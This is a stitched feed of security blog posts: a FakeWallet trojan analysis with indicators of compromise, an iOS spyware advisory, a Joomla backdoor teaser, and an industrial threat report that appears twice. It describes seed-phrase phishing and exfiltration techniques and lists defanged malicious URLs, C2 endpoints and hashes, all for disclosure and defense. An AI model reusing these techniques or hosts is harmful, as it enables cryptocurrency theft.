The second version of the infected Ledger wallet involves changes made directly to the main code of the app written in React Native. This approach eliminates the need for platform-specific libraries and allows attackers to run the same malicious module across different platforms. Since the Ledger Live source code is publicly available, injecting malicious code into it is a straightforward task for the attackers.
The infected build includes two malicious screens:

  • MnemonicVerifyScreen, embedded in PortfolioNavigator
  • PrivateKeyVerifyScreen, embedded in MyLedgerNavigator

In the React Native ecosystem, navigators handle switching between different screens. In this case, these specific navigators are triggered when the Portfolio or Device List screens are opened. In the original app, these screens remain inaccessible until the user pairs their cold wallet with the application. This same logic is preserved in the infected version, effectively serving as an anti-debugging technique: the phishing window only appears during a realistic usage scenario.

Phishing window for seed phrase verification

Phishing window for seed phrase verification

The MnemonicVerifyScreen appears whenever either of those navigators is activated – whether the user is checking their portfolio or viewing info about a paired device. The PrivateKeyVerifyScreen remains unused – it is designed to handle a private key rather than a mnemonic, specifically the key generated by the wallet based on the entered seed phrase. Since Ledger Live doesn’t give users direct access to private keys or support them for importing wallets, we suspect this specific feature was actually intended for a different app.

Decompiled pseudocode of an anonymous malicious function setting up the configuration during app startup

Decompiled pseudocode of an anonymous malicious function setting up the configuration during app startup

Once a victim enters their recovery phrase on the phishing page and hits Confirm, the Trojan creates a separate thread to handle the data exfiltration. It tracks the progress of the transfer by creating three files in the app’s working directory:

  • verify-wallet-status.json tracks the current status and the timestamp of the last update.
  • verify-wallet-config.json stores the C2 server configuration the malware is currently using.
  • verify-wallet-pending.json holds encrypted mnemonics until they’re successfully transmitted to the C2 server. Then the clearPendingMnemonicJob function replaces the contents of the file with an empty JSON dictionary.

Next, the Trojan encrypts the captured mnemonics and sends the resulting value to the C2 server. The data is encrypted using the same algorithm described earlier (RSA encryption followed by Base64 encoding). If the app is closed or minimized, the Trojan checks the status of the previous exfiltration attempt upon restart and resumes the process if it hasn’t been completed.

Decompiled pseudocode for the submitWalletSecret function

Decompiled pseudocode for the submitWalletSecret function

Other distribution channels, platforms, and the SparkKitty link

During our investigation, we discovered a website mimicking the official Ledger site that hosted links to the same infected apps described above. While we’ve only observed one such example, we’re certain that other similar phishing pages exist across the web.

A phishing website hosting links to infected Ledger apps for both iOS and Android

A phishing website hosting links to infected Ledger apps for both iOS and Android

We also identified several compromised versions of wallet apps for Android, including both previously undiscovered samples and known ones. These instances were distributed through the same malicious pages; however, we found no traces of them in the Google Play Store.

One additional detail: some of the infected apps also contained a SparkKitty module. Interestingly, these modules didn’t show any malicious activity on their own, with mnemonics handled exclusively by the FakeWallet modules. We suspect SparkKitty might be present for one of two reasons: either the authors of both malicious campaigns are linked and forgot to remove it, or it was embedded by different attackers and is currently inactive.

Victims

Since nearly all the phishing apps were exclusive to the Chinese App Store, and the infected wallets themselves were distributed through Chinese-language phishing pages, we can conclude that this campaign primarily targets users in China. However, the malicious modules themselves have no built-in regional restrictions. Furthermore, since the phishing notifications in some variants automatically adapt to the app’s language, users outside of China could easily find themselves in the crosshairs of these attackers.

Attribution

According to our data, the threat actor behind this campaign may be linked to the creators of the SparkKitty Trojan. Several details uncovered during our research point to this connection:

  • Some infected apps contained SparkKitty modules alongside the FakeWallet code.
  • The attackers behind both campaigns appear to be native Chinese speakers, as the malicious modules frequently use log messages in Chinese.
  • Both campaigns distribute infected apps via phishing pages that mimic the official App Store.
  • Both campaigns specifically target victims’ cryptocurrency assets.

Conclusion

Our research shows that the FakeWallet campaign is gaining momentum by employing new tactics, ranging from delivering payloads via phishing apps published in the App Store to embedding themselves into cold wallet apps and using sophisticated phishing notifications to trick users into revealing their mnemonics. The fact that these phishing apps bypass initial filters to appear at the top of App Store search results can significantly lower a user’s guard. While the campaign is not exceptionally complex from a technical standpoint, it poses serious risks to users for several reasons:

  • Hot wallet attacks: the malware can steal crypto assets during the wallet creation or import phase without any additional user interaction.
  • Cold wallet attacks: attackers go to great lengths to make their phishing windows look legitimate, even implementing mnemonic autocomplete to mirror the real user experience and increase their chances of a successful theft.
  • Investigation challenges: the technical restrictions imposed by iOS and the broader Apple ecosystem make it difficult to effectively detect and analyze malicious software directly on a device.

Indicators of compromise

Infected cryptowallet IPA file hashes
4126348d783393dd85ede3468e48405d
b639f7f81a8faca9c62fd227fef5e28c
d48b580718b0e1617afc1dec028e9059
bafba3d044a4f674fc9edc67ef6b8a6b
79fe383f0963ae741193989c12aefacc
8d45a67b648d2cb46292ff5041a5dd44
7e678ca2f01dc853e85d13924e6c8a45

Malicious dylib file hashes
be9e0d516f59ae57f5553bcc3cf296d1
fd0dc5d4bba740c7b4cc78c4b19a5840
7b4c61ff418f6fe80cf8adb474278311
8cbd34393d1d54a90be3c2b53d8fc17a
d138a63436b4dd8c5a55d184e025ef99
5bdae6cb778d002c806bb7ed130985f3

Malicious React Native application hash
84c81a5e49291fe60eb9f5c1e2ac184b

Phishing HTML for infected Ledger Live app file hash
19733e0dfa804e3676f97eff90f2e467

Malicious Android file hashes
8f51f82393c6467f9392fb9eb46f9301
114721fbc23ff9d188535bd736a0d30e

Malicious download links
hxxps://www.gxzhrc[.]cn/download/
hxxps://appstoreios[.]com/DjZH?key=646556306F6Q465O313L737N3332939Y353I830F31
hxxps://crypto-stroe[.]cc/
hxxps://yjzhengruol[.]com/s/3f605f
hxxps://6688cf.jhxrpbgq[.]com/6axqkwuq
hxxps://139.180.139[.]209/prod-api/system/confData/getUserConfByKey/
hxxps://xz.apps-store[.]im/s/iuXt?key=646Y563Y6F6H465J313X737U333S9342323N030R34&c=
hxxps://xz.apps-store[.]im/DjZH?key=646B563L6F6N4657313B737U3436335E3833331737
hxxps://xz.apps-store[.]im/s/dDan?key=646756376F6A465D313L737J333993473233038L39&c=
hxxps://xz.apps-store[.]im/CqDq?key=646R563V6F6Y465K313J737G343C3352383R336O35
hxxps://ntm0mdkzymy3n.oukwww[.]com/7nhn7jvv5YieDe7P?0e7b9c78e=686989d97cf0d70346cbde2031207cbf
hxxps://ntm0mdkzymy3n.oukwww[.]com/jFms03nKTf7RIZN8?61f68b07f8=0565364633b5acdd24a498a6a9ab4eca
hxxps://nziwytu5n.lahuafa[.]com/10RsW/mw2ZmvXKUEbzI0n
hxxps://zdrhnmjjndu.ulbcl[.]com/7uchSEp6DIEAqux?a3f65e=417ae7f384c49de8c672aec86d5a2860
hxxps://zdrhnmjjndu.ulbcl[.]com/tWe0ASmXJbDz3KGh?4a1bbe6d=31d25ddf2697b9e13ee883fff328b22f
hxxps://api.npoint[.]io/153b165a59f8f7d7b097
hxxps://mti4ywy4.lahuafa[.]com/UVB2U/mw2ZmvXKUEbzI0n
hxxps://mtjln.siyangoil[.]com/08dT284P/1ZMz5Xmb0EoQZVvS5
hxxps://odm0.siyangoil[.]com/TYTmtV8t/JG6T5nvM1AYqAcN
hxxps://mgi1y.siyangoil[.]com/vmzLvi4Dh/1Dd0m4BmAuhVVCbzF
hxxps://mziyytm5ytk.ahroar[.]com/kAN2pIEaariFb8Yc
hxxps://ngy2yjq0otlj.ahroar[.]com/EpCXMKDMx1roYGJ
hxxps://ngy2yjq0otlj.ahroar[.]com/17pIWJfr9DBiXYrSb

C2 addresses
hxxps://kkkhhhnnn[.]com/api/open/postByTokenpocket
hxxps://helllo2025[.]com/api/open/postByTokenpocket
hxxps://sxsfcc[.]com/api/open/postByTokenpocket
hxxps://iosfc[.]com/ledger/ios/Rsakeycatch.php
hxxps://nmu8n[.]com/tpocket/ios/Rsakeyword.php
hxxps://zmx6f[.]com/btp/ios/receiRsakeyword.php
hxxps://api.dc1637[.]xyz

  •  

Hackers leverage leaked government intelligence tools to target everyday iOS users | Kaspersky official blog

DarkSword and Coruna are two new tools for invisible attacks on iOS devices. These attacks require no user interaction and are already being actively used by bad actors in the wild. Before these threats emerged, most iPhone users didn’t have to lose sleep over their data security. Protection was really only a major concern for a narrow group — politicians, activists, diplomats, high-level business execs, and others who handle extremely sensitive data — who might be targeted by foreign intelligence agencies. We’ve covered sophisticated spyware used against such a group before — noting how hard to come by those tools were.

However, DarkSword and Coruna — discovered by researchers earlier this year — are total game-changers. This malware is being used for mass infections of everyday users. In this post, we dive into why this shift happened, why these tools are so dangerous, and how you can stay protected.

What we know about DarkSword, and how it can target your iPhone

In mid-March 2026, three separate research teams coordinated the release of their findings on a new spyware strain called DarkSword. This tool is capable of silently hacking devices running iOS 18 without the user ever knowing something is wrong.

First, we should clear up some confusion: iOS 18 isn’t as vintage as it might sound. Even though the latest version is iOS 26, Apple recently overhauled its versioning system, which threw everyone for a loop. They decided to jump ahead eight versions — from 18 straight to 26 — so the OS number matches the current year. Despite the jump, Apple estimates that about a quarter of all active devices still run iOS 18 or older.

With that cleared up, let’s get back to DarkSword. Research shows that this malware infects victims when they visit perfectly legitimate websites that have been injected with malicious code. The spyware installs itself without any user interaction at all: you just have to land on a compromised page. This is what’s known as a zero-click infection technique. Researchers report that several thousand devices have already been hit this way.

To compromise a device, DarkSword uses a six-vulnerability exploit chain to escape the sandbox, escalate privileges, and execute code. Once it’s in, the malware harvests data from the infected device, including:

  • Passwords
  • Photos
  • Chats and data from iMessage, WhatsApp, and Telegram
  • Browser history
  • Information from Apple’s Calendar, Notes, and Health apps

On top of all that, DarkSword lets attackers scoop up crypto-wallet data, making it essentially dual-purpose malware that functions as both a spy tool and a way to drain your crypto.

The only bit of good news is that the spyware doesn’t survive a reboot. DarkSword is fileless malware, meaning it lives in the device’s RAM, and never actually embeds itself into the file system.

Coruna: how older iOS versions are being targeted

Just two weeks before the DarkSword findings went public, researchers flagged another iOS threat dubbed Coruna. This malware is capable of compromising devices running older software — specifically iOS 13 through 17.2.1. Coruna uses the exact same playbook as DarkSword: victims visit a legitimate site injected with malicious code which then drops the malware onto the device. The whole process is completely invisible and requires zero user interaction.

A deep dive into Coruna’s code revealed it exploits a total of 23 different iOS vulnerabilities, several of which are tucked away in Apple’s WebKit. It’s worth reminding that, generally speaking (outside the EU), all iOS browsers are required to use the WebKit engine. This means these vulnerabilities don’t just affect Safari users — they’re a threat to anyone using a third-party browser on their iPhone as well.

The latest version of Coruna, much like DarkSword, includes modifications designed to drain crypto wallets. It also harvests photos and, in certain instances, email data. From what we can tell, stealing cryptocurrency seems to be the primary motive behind Coruna’s widespread deployment.

Who created Coruna and DarkSword — and how did they end up in the wild?

Code analysis of both tools suggests that Coruna and DarkSword were likely built by different developers. However, in both cases, we’re looking at software originally created by state-affiliated companies, possibly from the U.S. The high quality of the code points to this; these aren’t just Frankenstein kits cobbled together from random parts, but uniformly engineered exploits. Somewhere along the line, these tools leaked into the hands of cybercrime gangs.

Experts at Kaspersky’s GReAT analyzed all of Coruna’s components and confirmed that this exploit kit is actually an updated version of the framework used in Operation Triangulation. That earlier attack targeted Kaspersky employees, a story we covered in detail on this blog.

One theory suggests an employee at the company that developed Coruna sold it to hackers. Since then, the malware has been used to drain crypto wallets belonging to users in China; experts estimate that at least 42 000 devices were infected there alone.

As for DarkSword, cybercriminals have already used it to compromise users in Saudi Arabia, Turkey, and Malaysia. The problem is exacerbated by the fact that the attackers who first deployed DarkSword left the full source code on infected websites, meaning it could easily be picked up by other criminal groups.

The code also includes detailed comments in English explaining exactly what each component does, which supports the theory of its Western origins. These step-by-step instructions make it easy for other hackers to adapt the tool for their own purposes.

How to protect yourself from Coruna and DarkSword

Serious malware that allows for the mass infection of iPhones while requiring zero interaction from the user has now landed in the hands of an essentially unlimited pool of cybercriminals. To pick up Coruna or DarkSword, you simply have to visit the wrong site at the wrong time. So this is one of those cases where every user needs to take iOS security seriously — not just those in high-risk groups.

The best thing you can do to protect yourself from Coruna and DarkSword is to update your devices to the latest version of iOS or iPadOS 26, as soon as you can. If you can’t update to the newest software — for instance, if your device is older and doesn’t support iOS 26 — you should still install the latest version available to you. Specifically, look for versions 15.8.7, 16.7.15, or 18.7.7. In a rare move, Apple patched a wide range of older operating systems.

To protect your Apple devices from similar malware that will likely pop up in the future, we recommend the following:

  • Install updates promptly on all your Apple devices. The company regularly releases OS versions that patch known vulnerabilities — don’t skip them.
  • Enable Background Security Improvements. This feature allows your device to receive critical security fixes separately from full iOS updates, reducing the window for hackers to exploit vulnerabilities. To enable it, go to SettingsPrivacy & SecurityBackground Security Improvements and turn on the Automatically Install
  • Consider using Lockdown Mode. This is a heightened security setting that limits some device features but simultaneously blocks or significantly complicates attacks. To enable this, go to SettingsPrivacy & SecurityLockdown ModeTurn On Lockdown Mode.
  • Reboot your device once a day (or more). This stops fileless malware in its tracks, since these threats aren’t embedded in the system and disappear after a restart.
  • Use encrypted storage for sensitive data. Keep things like crypto wallet keys, photos of IDs, and confidential info in a secure vault. Kaspersky Password Manager is a great fit for this; it manages your passwords, two-factor authentication tokens, and passkeys across all your devices while also keeping your notes, photos, and docs synced and encrypted.

The idea that Apple devices are bulletproof is a myth. They’re vulnerable to zero-click attacks, Trojans, and ClickFix infection techniques — and we’ve even seen malicious apps slip into the App Store more than once. Read more here:

  •  

Joomla SEO Spam Injector: Obfuscated PHP Backdoor Hijacking Site Visitors

Joomla SEO Spam Injector: Obfuscated PHP Backdoor Hijacking Site Visitors

Overview

During a recent malware cleanup investigation, we encountered a compromised Joomla website where the site owner reported a strange issue. Their website displayed a large number of suspicious product links that had nothing to do with their business. These products were not added by the website owner and did not exist in their catalog.

Visitors and search engines were seeing pages that promoted unrelated products, raising immediate concerns about spam injection or remote content manipulation.

Continue reading Joomla SEO Spam Injector: Obfuscated PHP Backdoor Hijacking Site Visitors at Sucuri Blog.

  •  

Threat landscape for industrial automation systems in Q4 2025

Statistics across all threats

The percentage of ICS computers on which malicious objects were blocked has been decreasing since the beginning of 2024. In Q4 2025, it was 19.7%. Over the past three years, the percentage has decreased by 1.36 times, and by 1.25 times since Q4 2023.

Percentage of ICS computers on which malicious objects were blocked, Q1 2023–Q4 2025

Percentage of ICS computers on which malicious objects were blocked, Q1 2023–Q4 2025

Regionally, in Q4 2025, the percentage of ICS computers on which malicious objects were blocked ranged from 8.5% in Northern Europe to 27.3% in Africa.

Regions ranked by percentage of ICS computers on which malicious objects were blocked

Regions ranked by percentage of ICS computers on which malicious objects were blocked

Four regions saw an increase in the percentage of ICS computers on which malicious objects were blocked. The most notable increases occurred in Southern Europe and South Asia. In Q3 2025, East Asia experienced a sharp increase triggered by the local spread of malicious scripts, but the figure has since returned to normal.

Changes in percentage of ICS computers on which malicious objects were blocked, Q4 2025

Changes in percentage of ICS computers on which malicious objects were blocked, Q4 2025

Feature of the quarter: worms in email

In Q4 2025, the percentage of ICS computers on which wormsinemailattachments were blocked increasedinallregions of the world.

Many of the blocked threats were related to the worm Backdoor.MSIL.XWorm. This malware is designed to persist on the system and then remotely control it.

Interestingly, this threat was not detected on ICS computers in the previous quarter, yet it appeared in all regions in Q4 2025.

A study found that the active spread of Backdoor.MSIL.XWorm via phishing emails was likely linked to the use by hackers of another malware obfuscation technique that was actively used during massive phishing campaigns in Q4 2025. These campaigns have been known since 2024 as “Curriculum-vitae-catalina”.

The attackers distributed phishing emails to HR managers, recruiters, and employees responsible for hiring. The messages were disguised as responses from job applicants with subjects such as “Resume” or “Attached Resume” and contained a malicious executable file under the guise of a curriculum vitae. Typically, the file was named Curriculum Vitae-Catalina.exe. When executed, it infected the system.

In Q4 2025, the threat spread across regions in two waves — one in October and another in November. Russia, Western Europe, South America, and North America (Canada) were attacked in October. A spike in Backdoor.MSIL.XWorm blocking was observed in other regions in November. The attack subsided in all regions in December.

The highest percentage of ICS computers on which Backdoor.MSIL.XWorm was blocked was observed in regions where threats from email clients had been historically blocked at high rates on ICS computers: Southern Europe, South America, and the Middle East.

At the same time, in Africa, where USB storage media are still actively used, the threat was also detected when removable devices were connected to ICS computers.

Selected industries

The biometrics sector has historically led the rankings of industries and OT infrastructures surveyed in this report in terms of the percentage of ICS computers on which malicious objects were blocked.

These systems are characterized by accessibility to and from the internet, as well as minimal cybersecurity controls by the consumer organization.

Rankings of industries and OT infrastructure by percentage of ICS computers on which malicious objects were blocked

Rankings of industries and OT infrastructure by percentage of ICS computers on which malicious objects were blocked

In Q4 2025, the percentage of ICS computers on which malicious objects were blocked increased only in one sector: oil and gas. The corresponding figures increased in two regions: Russia, and Central Asia and the South Caucasus.

However, if we look at a broader time span, there is a downward trend in all the surveyed industries.

Percentage of ICS computers on which malicious objects were blocked in selected industries

Percentage of ICS computers on which malicious objects were blocked in selected industries

Diversity of detected malicious objects

In Q4 2025, Kaspersky protection solutions blocked malware from 10,142 different malware families of various categories on industrial automation systems.

Percentage of ICS computers on which the activity of malicious objects from various categories was blocked

Percentage of ICS computers on which the activity of malicious objects from various categories was blocked

In Q4 2025, there was an increase in the percentage of ICS computers on which worms, and miners in the form of executable files for Windows were blocked. These were the only categories that exhibited an increase.

Main threat sources

Depending on the threat detection and blocking scenario, it is not always possible to reliably identify the source. The circumstantial evidence for a specific source can be the blocked threat’s type (category).

The internet (visiting malicious or compromised internet resources; malicious content distributed via messengers; cloud data storage and processing services and CDNs), email clients (phishing emails), and removable storage devices remain the primary sources of threats to computers in an organization’s technology infrastructure.

In Q4 2025, the percentage of ICS computers on which malicious objects from various sources were blocked decreased. All sources except email clients saw their lowest levels in three years.

Percentage of ICS computers on which malicious objects from various sources were blocked

Percentage of ICS computers on which malicious objects from various sources were blocked

The same computer can be attacked by several categories of malware from the same source during a quarter. That computer is counted when calculating the percentage of attacked computers for each threat category, but is only counted once for the threat source (we count unique attacked computers). In addition, it is not always possible to accurately determine the initial infection attempt. Therefore, the total percentage of ICS computers on which various categories of threats from a certain source were blocked can exceed the percentage of computers affected by the source itself.

  • In Q4 2025, the percentage of ICS computers on which threats from the internet were blocked decreased to 7.67% and reached its lowest level since the beginning of 2023. The main categories of internet threats are malicious scripts and phishing pages, and denylisted internet resources. The percentage ranged from 3.96% in Northern Europe to 11.33% in South Asia.
  • The main categories of threats from email clients blocked on ICS computers were malicious scripts and phishing pages, spyware, and malicious documents. Most of the spyware detected in phishing emails was delivered as a password archive or a multi-layered script embedded in office document files. The percentage of ICS computers on which threats from email clients were blocked ranged from 0.64% in Northern Europe to 6.34% in Southern Europe.
  • The main categories of threats that were blocked when removable media was connected to ICS computers were worms, viruses, and spyware. The percentage of ICS computers on which threats from removable media were blocked ranged from 0.05% in Australia and New Zealand to 1.41% in Africa.
  • The main categories of threats that spread through network folders in Q4 2025 were viruses, AutoCAD malware, worms, and spyware. The percentage of ICS computers on which threats from network folders were blocked ranged from 0.01% in Northern Europe to 0.18% in East Asia.

Threat categories

Typical attacks blocked within an OT network are multi-step sequences of malicious activities, where each subsequent step of the attackers is aimed at increasing privileges and/or gaining access to other systems by exploiting the security problems of industrial enterprises, including OT infrastructures.

Malicious objects used for initial infection

In Q4 2025, the percentage of ICS computers on which denylisted internet resources were blocked decreased to 3.26%. This is the lowest quarterly figure since the beginning of 2022, and it has decreased by 1.8 times since Q2 2025.

Percentage of ICS computers on which denylisted internet resources were blocked, Q1 2023–Q4 2025

Percentage of ICS computers on which denylisted internet resources were blocked, Q1 2023–Q4 2025

Regionally, the percentage of ICS computers on which denylisted internet resources were blocked ranged from 1.74% in Northern Europe to 3.93% in Southeast Asia, which displaced Africa from first place. Russia rounded out the top three regions for this indicator.

The percentage of ICS computers on which malicious documents were blocked increased for three consecutive quarters. However, in Q4 2025 it decreased by 0.22 pp to 1.76%.

Percentage of ICS computers on which malicious documents were blocked, Q1 2023–Q4 2025

Percentage of ICS computers on which malicious documents were blocked, Q1 2023–Q4 2025

Regionally, the percentage ranged from 0.46% in Northern Europe to 3.82% in Southern Europe. In Q4 2025, the indicator increased in Eastern Europe, Russia, and Western Europe.

The percentage of ICS computers on which malicious scripts and phishing pages were blocked decreased to 6.58%. Despite the decline, this category led the rankings of threat categories in terms of the percentage of ICS computers on which they were blocked.

Percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q1 2023–Q4 2025

Percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q1 2023–Q4 2025

Regionally, the percentage ranged from 2.52% in Northern Europe to 10.50% in South Asia. The indicator increased in South Asia, South America, Southern Europe, and Africa. South Asia saw the most notable increase, at 3.47 pp.

Next-stage malware

Malicious objects used to initially infect computers deliver next-stage malware — spyware, ransomware, and miners — to victims’ computers. As a rule, the higher the percentage of ICS computers on which the initial infection malware is blocked, the higher the percentage for next-stage malware.

In Q4 2025, the percentage of ICS computers on which spyware, ransomware and web miners were blocked decreased. The rates were:

  • Spyware: 3.80% (down 0.24 pp). For the second quarter in a row, spyware took second place in the rankings of threat categories in terms of the percentage of ICS computers on which it was blocked.
  • Ransomware: 0.16% (down 0.01 pp).
  • Web miners: 0.24% (down 0.01 pp), this is the lowest level observed thus far in the period under review.

The percentage of ICS computers on which miners in the form of executable files for Windows were blocked increased to 0.60% (up 0.03 pp).

Self-propagating malware

Self-propagating malware (worms and viruses) is a category unto itself. Worms and virus-infected files were originally used for initial infection, but as botnet functionality evolved, they took on next-stage characteristics.

To spread across ICS networks, viruses and worms rely on removable media and network folders and are distributed in the form of infected files, such as archives with backups, office documents, pirated games and hacked applications. In rarer and more dangerous cases, web pages with network equipment settings, as well as files stored in internal document management systems, product lifecycle management (PLM) systems, resource management (ERP) systems and other web services are infected.

In Q4 2025, the percentage of ICS computers on which worms were blocked increased by 1.6 times to 1.60%. As mentioned above, this increase is related to a global phishing attack that spread the Backdoor.MSIL.XWorm backdoor worm across all regions of the world. The percentage increased in all regions. The biggest increase (up by 2.16 times) was in Southern Europe. The malware was primary distributed through email clients, and Southern Europe led the way in terms of the percentage of ICS computers on which threats from email clients were blocked.

The percentage of ICS computers on which viruses were blocked decreased to 1.33%.

AutoCAD malware

This category of malware can spread in a variety of ways, so it does not belong to a specific group.

After an increase in the previous quarter, the percentage of ICS computers on which AutoCAD malware was blocked decreased to 0.29% in Q4 2025.

For more information on industrial threats see the full version of the report.

  •  

Threat landscape for industrial automation systems in Q4 2025

Statistics across all threats

The percentage of ICS computers on which malicious objects were blocked has been decreasing since the beginning of 2024. In Q4 2025, it was 19.7%. Over the past three years, the percentage has decreased by 1.36 times, and by 1.25 times since Q4 2023.

Percentage of ICS computers on which malicious objects were blocked, Q1 2023–Q4 2025

Percentage of ICS computers on which malicious objects were blocked, Q1 2023–Q4 2025

Regionally, in Q4 2025, the percentage of ICS computers on which malicious objects were blocked ranged from 8.5% in Northern Europe to 27.3% in Africa.

Regions ranked by percentage of ICS computers on which malicious objects were blocked

Regions ranked by percentage of ICS computers on which malicious objects were blocked

Four regions saw an increase in the percentage of ICS computers on which malicious objects were blocked. The most notable increases occurred in Southern Europe and South Asia. In Q3 2025, East Asia experienced a sharp increase triggered by the local spread of malicious scripts, but the figure has since returned to normal.

Changes in percentage of ICS computers on which malicious objects were blocked, Q4 2025

Changes in percentage of ICS computers on which malicious objects were blocked, Q4 2025

Feature of the quarter: worms in email

In Q4 2025, the percentage of ICS computers on which wormsinemailattachments were blocked increasedinallregions of the world.

Many of the blocked threats were related to the worm Backdoor.MSIL.XWorm. This malware is designed to persist on the system and then remotely control it.

Interestingly, this threat was not detected on ICS computers in the previous quarter, yet it appeared in all regions in Q4 2025.

A study found that the active spread of Backdoor.MSIL.XWorm via phishing emails was likely linked to the use by hackers of another malware obfuscation technique that was actively used during massive phishing campaigns in Q4 2025. These campaigns have been known since 2024 as “Curriculum-vitae-catalina”.

The attackers distributed phishing emails to HR managers, recruiters, and employees responsible for hiring. The messages were disguised as responses from job applicants with subjects such as “Resume” or “Attached Resume” and contained a malicious executable file under the guise of a curriculum vitae. Typically, the file was named Curriculum Vitae-Catalina.exe. When executed, it infected the system.

In Q4 2025, the threat spread across regions in two waves — one in October and another in November. Russia, Western Europe, South America, and North America (Canada) were attacked in October. A spike in Backdoor.MSIL.XWorm blocking was observed in other regions in November. The attack subsided in all regions in December.

The highest percentage of ICS computers on which Backdoor.MSIL.XWorm was blocked was observed in regions where threats from email clients had been historically blocked at high rates on ICS computers: Southern Europe, South America, and the Middle East.

At the same time, in Africa, where USB storage media are still actively used, the threat was also detected when removable devices were connected to ICS computers.

Selected industries

The biometrics sector has historically led the rankings of industries and OT infrastructures surveyed in this report in terms of the percentage of ICS computers on which malicious objects were blocked.

These systems are characterized by accessibility to and from the internet, as well as minimal cybersecurity controls by the consumer organization.

Rankings of industries and OT infrastructure by percentage of ICS computers on which malicious objects were blocked

Rankings of industries and OT infrastructure by percentage of ICS computers on which malicious objects were blocked

In Q4 2025, the percentage of ICS computers on which malicious objects were blocked increased only in one sector: oil and gas. The corresponding figures increased in two regions: Russia, and Central Asia and the South Caucasus.

However, if we look at a broader time span, there is a downward trend in all the surveyed industries.

Percentage of ICS computers on which malicious objects were blocked in selected industries

Percentage of ICS computers on which malicious objects were blocked in selected industries

Diversity of detected malicious objects

In Q4 2025, Kaspersky protection solutions blocked malware from 10,142 different malware families of various categories on industrial automation systems.

Percentage of ICS computers on which the activity of malicious objects from various categories was blocked

Percentage of ICS computers on which the activity of malicious objects from various categories was blocked

In Q4 2025, there was an increase in the percentage of ICS computers on which worms, and miners in the form of executable files for Windows were blocked. These were the only categories that exhibited an increase.

Main threat sources

Depending on the threat detection and blocking scenario, it is not always possible to reliably identify the source. The circumstantial evidence for a specific source can be the blocked threat’s type (category).

The internet (visiting malicious or compromised internet resources; malicious content distributed via messengers; cloud data storage and processing services and CDNs), email clients (phishing emails), and removable storage devices remain the primary sources of threats to computers in an organization’s technology infrastructure.

In Q4 2025, the percentage of ICS computers on which malicious objects from various sources were blocked decreased. All sources except email clients saw their lowest levels in three years.

Percentage of ICS computers on which malicious objects from various sources were blocked

Percentage of ICS computers on which malicious objects from various sources were blocked

The same computer can be attacked by several categories of malware from the same source during a quarter. That computer is counted when calculating the percentage of attacked computers for each threat category, but is only counted once for the threat source (we count unique attacked computers). In addition, it is not always possible to accurately determine the initial infection attempt. Therefore, the total percentage of ICS computers on which various categories of threats from a certain source were blocked can exceed the percentage of computers affected by the source itself.

  • In Q4 2025, the percentage of ICS computers on which threats from the internet were blocked decreased to 7.67% and reached its lowest level since the beginning of 2023. The main categories of internet threats are malicious scripts and phishing pages, and denylisted internet resources. The percentage ranged from 3.96% in Northern Europe to 11.33% in South Asia.
  • The main categories of threats from email clients blocked on ICS computers were malicious scripts and phishing pages, spyware, and malicious documents. Most of the spyware detected in phishing emails was delivered as a password archive or a multi-layered script embedded in office document files. The percentage of ICS computers on which threats from email clients were blocked ranged from 0.64% in Northern Europe to 6.34% in Southern Europe.
  • The main categories of threats that were blocked when removable media was connected to ICS computers were worms, viruses, and spyware. The percentage of ICS computers on which threats from removable media were blocked ranged from 0.05% in Australia and New Zealand to 1.41% in Africa.
  • The main categories of threats that spread through network folders in Q4 2025 were viruses, AutoCAD malware, worms, and spyware. The percentage of ICS computers on which threats from network folders were blocked ranged from 0.01% in Northern Europe to 0.18% in East Asia.

Threat categories

Typical attacks blocked within an OT network are multi-step sequences of malicious activities, where each subsequent step of the attackers is aimed at increasing privileges and/or gaining access to other systems by exploiting the security problems of industrial enterprises, including OT infrastructures.

Malicious objects used for initial infection

In Q4 2025, the percentage of ICS computers on which denylisted internet resources were blocked decreased to 3.26%. This is the lowest quarterly figure since the beginning of 2022, and it has decreased by 1.8 times since Q2 2025.

Percentage of ICS computers on which denylisted internet resources were blocked, Q1 2023–Q4 2025

Percentage of ICS computers on which denylisted internet resources were blocked, Q1 2023–Q4 2025

Regionally, the percentage of ICS computers on which denylisted internet resources were blocked ranged from 1.74% in Northern Europe to 3.93% in Southeast Asia, which displaced Africa from first place. Russia rounded out the top three regions for this indicator.

The percentage of ICS computers on which malicious documents were blocked increased for three consecutive quarters. However, in Q4 2025 it decreased by 0.22 pp to 1.76%.

Percentage of ICS computers on which malicious documents were blocked, Q1 2023–Q4 2025

Percentage of ICS computers on which malicious documents were blocked, Q1 2023–Q4 2025

Regionally, the percentage ranged from 0.46% in Northern Europe to 3.82% in Southern Europe. In Q4 2025, the indicator increased in Eastern Europe, Russia, and Western Europe.

The percentage of ICS computers on which malicious scripts and phishing pages were blocked decreased to 6.58%. Despite the decline, this category led the rankings of threat categories in terms of the percentage of ICS computers on which they were blocked.

Percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q1 2023–Q4 2025

Percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q1 2023–Q4 2025

Regionally, the percentage ranged from 2.52% in Northern Europe to 10.50% in South Asia. The indicator increased in South Asia, South America, Southern Europe, and Africa. South Asia saw the most notable increase, at 3.47 pp.

Next-stage malware

Malicious objects used to initially infect computers deliver next-stage malware — spyware, ransomware, and miners — to victims’ computers. As a rule, the higher the percentage of ICS computers on which the initial infection malware is blocked, the higher the percentage for next-stage malware.

In Q4 2025, the percentage of ICS computers on which spyware, ransomware and web miners were blocked decreased. The rates were:

  • Spyware: 3.80% (down 0.24 pp). For the second quarter in a row, spyware took second place in the rankings of threat categories in terms of the percentage of ICS computers on which it was blocked.
  • Ransomware: 0.16% (down 0.01 pp).
  • Web miners: 0.24% (down 0.01 pp), this is the lowest level observed thus far in the period under review.

The percentage of ICS computers on which miners in the form of executable files for Windows were blocked increased to 0.60% (up 0.03 pp).

Self-propagating malware

Self-propagating malware (worms and viruses) is a category unto itself. Worms and virus-infected files were originally used for initial infection, but as botnet functionality evolved, they took on next-stage characteristics.

To spread across ICS networks, viruses and worms rely on removable media and network folders and are distributed in the form of infected files, such as archives with backups, office documents, pirated games and hacked applications. In rarer and more dangerous cases, web pages with network equipment settings, as well as files stored in internal document management systems, product lifecycle management (PLM) systems, resource management (ERP) systems and other web services are infected.

